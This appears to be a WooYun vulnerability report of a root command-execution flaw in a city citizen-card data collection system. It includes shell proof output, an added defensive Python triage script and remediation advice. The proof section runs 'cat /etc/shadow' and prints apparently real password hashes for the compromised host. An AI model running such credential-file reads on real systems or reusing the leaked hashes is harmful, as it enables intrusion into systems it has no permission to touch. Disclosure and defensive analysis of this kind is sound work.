
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0152874

Title: Command execution vulnerability (getshell) in a certain city's data collection system

Vendor: cncert (National Internet Emergency Center)

Author: 朱元璋

Submitted: 2015-11-10 14:00

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Type: system/service patch not applied in time

Severity: High

Self-assessed rank: 15

Status: handed over to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-10: Details sent to the vendor, awaiting vendor handling
2015-11-20: Vendor confirmed; details visible to the vendor only
2015-11-30: Details disclosed to core white hats and domain experts
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

As titled.

Detailed description:

The Zhangjiagang citizen-card batch data collection system at **.**.**.**:8080/dc-web-batch/login.action has a command execution vulnerability. Commands injected through the .action endpoint run with the privileges of the Tomcat process, which, as the proof below shows, is root.

A webshell was uploaded directly to the server.

Proof of vulnerability:

[/root/zjgweb/apache-tomcat-6.0.26/webapps/dc-web-batch/dc-web-batch/]$ whoami
root
/bin/sh: line 0: cd: /root/zjgweb/apache-tomcat-6.0.26/webapps/dc-web-batch/dc-web-batch/: No such file or directory
[/root/zjgweb/apache-tomcat-6.0.26/bin/]$ chkconfig --list
NetworkManager 0:off 1:off 2:off 3:off 4:off 5:off 6:off
acpid 0:off 1:off 2:on 3:on 4:on 5:on 6:off
anacron 0:off 1:off 2:on 3:on 4:on 5:on 6:off
apmd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
atd 0:off 1:off 2:off 3:on 4:on 5:on 6:off
auditd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
autofs 0:off 1:off 2:off 3:on 4:on 5:on 6:off
avahi-daemon 0:off 1:off 2:off 3:on 4:on 5:on 6:off
avahi-dnsconfd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
bluetooth 0:off 1:off 2:on 3:on 4:on 5:on 6:off
capi 0:off 1:off 2:off 3:off 4:off 5:off 6:off
conman 0:off 1:off 2:off 3:off 4:off 5:off 6:off
cpuspeed 0:off 1:on 2:on 3:on 4:on 5:on 6:off
crond 0:off 1:off 2:on 3:on 4:on 5:on 6:off
cups 0:off 1:off 2:on 3:on 4:on 5:on 6:off
dc_client 0:off 1:off 2:off 3:off 4:off 5:off 6:off
dc_server 0:off 1:off 2:off 3:off 4:off 5:off 6:off
dnsmasq 0:off 1:off 2:off 3:off 4:off 5:off 6:off
dund 0:off 1:off 2:off 3:off 4:off 5:off 6:off
firstboot 0:off 1:off 2:off 3:on 4:off 5:on 6:off
gpm 0:off 1:off 2:on 3:on 4:on 5:on 6:off
haldaemon 0:off 1:off 2:off 3:on 4:on 5:on 6:off
hidd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
hplip 0:off 1:off 2:on 3:on 4:on 5:on 6:off
httpd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
ip6tables 0:off 1:off 2:on 3:on 4:on 5:on 6:off
ipmi 0:off 1:off 2:off 3:off 4:off 5:off 6:off
iptables 0:off 1:off 2:off 3:off 4:off 5:off 6:off
irda 0:off 1:off 2:off 3:off 4:off 5:off 6:off
irqbalance 0:off 1:off 2:on 3:on 4:on 5:on 6:off
isdn 0:off 1:off 2:on 3:on 4:on 5:on 6:off
kdump 0:off 1:off 2:on 3:on 4:on 5:on 6:off
kudzu 0:off 1:off 2:off 3:on 4:on 5:on 6:off
lm_sensors 0:off 1:off 2:on 3:on 4:on 5:on 6:off
lvm2-monitor 0:off 1:on 2:on 3:on 4:on 5:on 6:off
mcstrans 0:off 1:off 2:on 3:on 4:on 5:on 6:off
mdmonitor 0:off 1:off 2:on 3:on 4:on 5:on 6:off
mdmpd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
messagebus 0:off 1:off 2:off 3:on 4:on 5:on 6:off
microcode_ctl 0:off 1:off 2:on 3:on 4:on 5:on 6:off
multipathd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
mysql 0:off 1:off 2:on 3:on 4:on 5:on 6:off
netconsole 0:off 1:off 2:off 3:off 4:off 5:off 6:off
netfs 0:off 1:off 2:off 3:on 4:on 5:on 6:off
netplugd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
network 0:off 1:off 2:on 3:on 4:on 5:on 6:off
nfs 0:off 1:off 2:off 3:off 4:off 5:off 6:off
nfslock 0:off 1:off 2:off 3:on 4:on 5:on 6:off
nscd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
ntpd 0:off 1:off 2:off 3:on 4:off 5:on 6:off
pand 0:off 1:off 2:off 3:off 4:off 5:off 6:off
pcscd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
portmap 0:off 1:off 2:off 3:on 4:on 5:on 6:off
psacct 0:off 1:off 2:off 3:off 4:off 5:off 6:off
rawdevices 0:off 1:off 2:off 3:on 4:on 5:on 6:off
rdisc 0:off 1:off 2:off 3:off 4:off 5:off 6:off
readahead_early 0:off 1:off 2:on 3:on 4:on 5:on 6:off
readahead_later 0:off 1:off 2:off 3:off 4:off 5:on 6:off
restorecond 0:off 1:off 2:on 3:on 4:on 5:on 6:off
rhnsd 0:off 1:off 2:off 3:on 4:on 5:on 6:off
rpcgssd 0:off 1:off 2:off 3:on 4:on 5:on 6:off
rpcidmapd 0:off 1:off 2:off 3:on 4:on 5:on 6:off
rpcsvcgssd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
saslauthd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
sendmail 0:off 1:off 2:on 3:on 4:on 5:on 6:off
setroubleshoot 0:off 1:off 2:off 3:on 4:on 5:on 6:off
smartd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
snmpd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
snmptrapd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
squid 0:off 1:off 2:off 3:off 4:off 5:off 6:off
sshd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
syslog 0:off 1:off 2:on 3:on 4:on 5:on 6:off
sysstat 0:off 1:off 2:on 3:on 4:off 5:on 6:off
tux 0:off 1:off 2:off 3:off 4:off 5:off 6:off
vncserver 0:off 1:off 2:on 3:on 4:on 5:on 6:off
vsftpd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
wdaemon 0:off 1:off 2:off 3:off 4:off 5:off 6:off
winbind 0:off 1:off 2:off 3:off 4:off 5:off 6:off
wpa_supplicant 0:off 1:off 2:off 3:off 4:off 5:off 6:off
xfs 0:off 1:off 2:on 3:on 4:on 5:on 6:off
xinetd 0:off 1:off 2:off 3:on 4:on 5:on 6:off
ypbind 0:off 1:off 2:off 3:off 4:off 5:off 6:off
yum-updatesd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
xinetd based services:
chargen-dgram: off
chargen-stream: off
daytime-dgram: off
daytime-stream: off
discard-dgram: off
discard-stream: off
echo-dgram: off
echo-stream: off
eklogin: off
ekrb5-telnet: off
gssftp: off
klogin: off
krb5-telnet: off
kshell: off
rmcp: off
rsync: off
tcpmux-server: off
tftp: off
time-dgram: off
time-stream: off
[/root/zjgweb/apache-tomcat-6.0.26/bin/]$ chkconfig --list atd
atd 0:off 1:off 2:off 3:on 4:on 5:on 6:off
[/root/zjgweb/apache-tomcat-6.0.26/bin/]$ cat /etc/shadow
root:$1$PO9ir4ss$woXEIjJBQJKtZrKC8vgaf/:14729:0:99999:7:::
bin:*:14728:0:99999:7:::
daemon:*:14728:0:99999:7:::
adm:*:14728:0:99999:7:::
lp:*:14728:0:99999:7:::
sync:*:14728:0:99999:7:::
shutdown:*:14728:0:99999:7:::
halt:*:14728:0:99999:7:::
mail:*:14728:0:99999:7:::
news:*:14728:0:99999:7:::
uucp:*:14728:0:99999:7:::
operator:*:14728:0:99999:7:::
games:*:14728:0:99999:7:::
gopher:*:14728:0:99999:7:::
ftp:*:14728:0:99999:7:::
nobody:*:14728:0:99999:7:::
nscd:!!:14728:0:99999:7:::
vcsa:!!:14728:0:99999:7:::
rpc:!!:14728:0:99999:7:::
mailnull:!!:14728:0:99999:7:::
smmsp:!!:14728:0:99999:7:::
pcap:!!:14728:0:99999:7:::
ntp:!!:14728:0:99999:7:::
dbus:!!:14728:0:99999:7:::
avahi:!!:14728:0:99999:7:::
sshd:!!:14728:0:99999:7:::
rpcuser:!!:14728:0:99999:7:::
nfsnobody:!!:14728:0:99999:7:::
haldaemon:!!:14728:0:99999:7:::
avahi-autoipd:!!:14728:0:99999:7:::
distcache:!!:14728:0:99999:7:::
apache:!!:14728:0:99999:7:::
webalizer:!!:14728:0:99999:7:::
squid:!!:14728:0:99999:7:::
xfs:!!:14728:0:99999:7:::
gdm:!!:14728:0:99999:7:::
sabayon:!!:14728:0:99999:7:::
user:$1$pdDkOI6I$JFJtnnlfxENd6gZQ191yu1:14728:0:99999:7:::
mysql:$1$zUAcHuUD$7GeGTJKZyh7BMMiRzF3hI/:15000::::::
java:$1$ehUj3BS0$PC32eB20nINWl3JRAZwK.0:14790:0:99999:7:::
zjgsmk:$1$OmWE0ScG$Nmex0wNRsEAQ/Jk4y4Ull.:14790:0:99999:7:::
oracle:$1$R/c.mkOe$KkwTbjvZ2akuatr7KuMef1:16528:0:99999:7:::
digitalchina:$1$VhbxkMpi$kpKu0oLxU72wlSNeovgKu1:14865:0:99999:7:::
[/root/zjgweb/apache-tomcat-6.0.26/bin/]$ ifconfig
eth0 Link encap:Ethernet HWaddr E4:1F:13:61:9B:10
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::e61f:13ff:fe61:9b10/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:48601149 errors:0 dropped:0 overruns:0 frame:0
TX packets:68442523 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3043477558 (2.8 GiB) TX bytes:2002988966 (1.8 GiB)
Interrupt:169 Memory:92000000-92012800
lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:10353694 errors:0 dropped:0 overruns:0 frame:0
TX packets:10353694 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1929325397 (1.7 GiB) TX bytes:1929325397 (1.7 GiB)
usb0 Link encap:Ethernet HWaddr E6:1F:13:53:9B:13
inet6 addr: fe80::e41f:13ff:fe53:9b13/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5390460 errors:0 dropped:0 overruns:0 frame:0
TX packets:18 errors:9 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:350379900 (334.1 MiB) TX bytes:4186 (4.0 KiB)
[/root/zjgweb/apache-tomcat-6.0.26/bin/]$ cat /etc/resolv.conf
search localdomain
nameserver **.**.**.**
[/root/zjgweb/apache-tomcat-6.0.26/bin/]$ bash prompt:
bash: prompt:: No such file or directory
[/root/zjgweb/apache-tomcat-6.0.26/bin/]$ lsb_release -a
LSB Version: :core-3.1-ia32:core-3.1-noarch:graphics-3.1-ia32:graphics-3.1-noarch
Distributor ID: RedHatEnterpriseServer
Description: Red Hat Enterprise Linux Server release 5.4 (Tikanga)
Release: 5.4
Codename: Tikanga
[/root/zjgweb/apache-tomcat-6.0.26/bin/]$
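The proof above dumps two host artefacts in full: the /etc/shadow file and the `chkconfig --list` table. Beyond confirming root, they carry the findings a responder would pull out first: every live account uses MD5-crypt ($1$) hashes, the root password was last changed in April 2010, the host firewall (`iptables`) is off in every runlevel, and desktop or unneeded services (vncserver, vsftpd, sendmail, cups, bluetooth) start in runlevels 2 through 5. The following Python is an added example, not the reporter's code and not anything taken from the affected system: it parses both formats offline and produces those findings. The UNEXPECTED_ON_SERVER list is this example's own assumption about a headless data-collection server, and the sample lines are constructed in the same format as the dump with made-up hashes.

```python
# Added example (not part of the original report): offline triage of /etc/shadow
# lines and `chkconfig --list` output as dumped in the proof section above.
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Dict, List, Optional, Set, Tuple, Union

# crypt(3) hash prefix -> scheme name. "$1$" (MD5-crypt) is what the dumped file uses.
CRYPT_SCHEMES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}

# Assumption of this example: SysV services a headless data-collection server
# has no business starting. Adjust to the host's actual role.
UNEXPECTED_ON_SERVER = {
    "bluetooth", "hidd", "cups", "hplip", "isdn", "avahi-daemon",
    "vncserver", "vsftpd", "sendmail", "pcscd",
}


@dataclass
class ShadowEntry:
    user: str
    scheme: str                   # "locked", "nopassword", a CRYPT_SCHEMES value, or "unknown"
    last_change: Optional[date]   # field 3: days since 1970-01-01
    max_days: Optional[int]       # field 5: maximum password age in days


def parse_shadow_line(line: str) -> ShadowEntry:
    """Parse one /etc/shadow line (9 colon-separated fields)."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"malformed shadow line: {line!r}")
    user, pw, lastchg, _min_days, max_days = fields[:5]
    if pw == "":
        scheme = "nopassword"           # empty field: password login without a password
    elif pw == "*" or pw.startswith("!"):
        scheme = "locked"               # "*", "!", "!!" or "!<hash>": password login disabled
    else:
        scheme = next((name for prefix, name in CRYPT_SCHEMES.items()
                       if pw.startswith(prefix)), "unknown")
    last = date(1970, 1, 1) + timedelta(days=int(lastchg)) if lastchg else None
    return ShadowEntry(user, scheme, last, int(max_days) if max_days else None)


def weak_accounts(lines: List[str], as_of: Union[date, str],
                  max_age_days: int = 365) -> List[Tuple[str, List[str]]]:
    """Accounts that can log in with a password and either use a weak/unknown
    hash or have not rotated the password within max_age_days before `as_of`."""
    if isinstance(as_of, str):
        as_of = date.fromisoformat(as_of)
    findings = []
    for line in lines:
        if not line.strip():
            continue
        e = parse_shadow_line(line)
        if e.scheme == "locked":
            continue
        reasons = []
        if e.scheme in ("md5crypt", "unknown", "nopassword"):
            reasons.append(f"hash scheme {e.scheme}")
        if e.last_change is not None and (as_of - e.last_change).days > max_age_days:
            reasons.append(f"password unchanged since {e.last_change.isoformat()}")
        if reasons:
            findings.append((e.user, reasons))
    return findings


def parse_chkconfig(text: str) -> Dict[str, Set[int]]:
    """Map SysV service name -> runlevels in which it starts. Parsing stops at
    the 'xinetd based services:' section, whose lines have a different shape."""
    services: Dict[str, Set[int]] = {}
    for line in text.splitlines():
        if line.startswith("xinetd based services:"):
            break
        parts = line.split()
        if len(parts) != 8:             # name + seven "N:on|off" columns
            continue
        name, levels = parts[0], parts[1:]
        services[name] = {int(col.split(":")[0]) for col in levels if col.endswith(":on")}
    return services


def surprising_services(text: str, runlevel: int = 3) -> List[str]:
    """Services from UNEXPECTED_ON_SERVER that start in the given runlevel."""
    services = parse_chkconfig(text)
    return sorted(n for n, levels in services.items()
                  if runlevel in levels and n in UNEXPECTED_ON_SERVER)


def host_firewall_disabled(text: str, runlevel: int = 3) -> bool:
    """True when the iptables init script is not enabled in the runlevel."""
    return runlevel not in parse_chkconfig(text).get("iptables", set())


# Constructed sample input in the format of the dump above; the hashes are fake.
SAMPLE_SHADOW = """\
root:$1$aaaaaaaa$bbbbbbbbbbbbbbbbbbbbbb:14729:0:99999:7:::
bin:*:14728:0:99999:7:::
sshd:!!:14728:0:99999:7:::
mysql:$1$cccccccc$dddddddddddddddddddddd:15000::::::
oracle:$6$eeeeeeee$ffffffffffffffffffffffffffffffffffffffffffff:16528:0:99999:7:::
""".splitlines()

SAMPLE_CHKCONFIG = """\
acpid 0:off 1:off 2:on 3:on 4:on 5:on 6:off
bluetooth 0:off 1:off 2:on 3:on 4:on 5:on 6:off
ip6tables 0:off 1:off 2:on 3:on 4:on 5:on 6:off
iptables 0:off 1:off 2:off 3:off 4:off 5:off 6:off
sshd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
vncserver 0:off 1:off 2:on 3:on 4:on 5:on 6:off
vsftpd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
xinetd based services:
tftp: off
"""

if __name__ == "__main__":
    for user, reasons in weak_accounts(SAMPLE_SHADOW, as_of="2015-11-10"):
        print(f"{user}: {'; '.join(reasons)}")
    print("unexpected services in runlevel 3:", surprising_services(SAMPLE_CHKCONFIG))
    print("host firewall disabled:", host_firewall_disabled(SAMPLE_CHKCONFIG))
```

On the constructed sample, run as of the report date, root and mysql are flagged (MD5-crypt and stale), the locked system accounts are skipped, the oracle account passes because its sha512crypt password is under a year old, and bluetooth, vncserver and vsftpd show up as unexpected services with the host firewall disabled. Feeding the real dump from the proof section through the same functions reproduces the findings listed in the lead-in; the shadow field layout and the `N:on`/`N:off` column format are the standard ones, so the parsers work unchanged on output copied from a RHEL 5 host.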

Remediation:

Raise security awareness. Concretely, from what the proof shows: apply the outstanding patches to the web framework serving the /dc-web-batch/login.action endpoint (the report is classed as an unapplied system/service patch); stop running Tomcat as root (`whoami` returns root and the installation lives under /root/zjgweb), so that a webshell no longer inherits uid 0; enable the host firewall (`iptables` is off in every runlevel) and disable services a data-collection server does not need (vncserver, vsftpd, sendmail, cups and bluetooth start in runlevels 2 through 5); rotate every password in the dumped /etc/shadow, which uses MD5-crypt ($1$) hashes and whose root entry was last changed in April 2010; and bring the base system forward from RHEL 5.4, a 2009 point release.

Copyright notice: when reposting, credit the source: 朱元璋@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 12

Confirmed: 2015-11-20 17:26

Vendor reply:

CNVD did not directly reproduce the described situation; it has been passed via CNCERT to the Jiangsu branch center, which will coordinate handling with the website's operating unit.

Latest status:

None

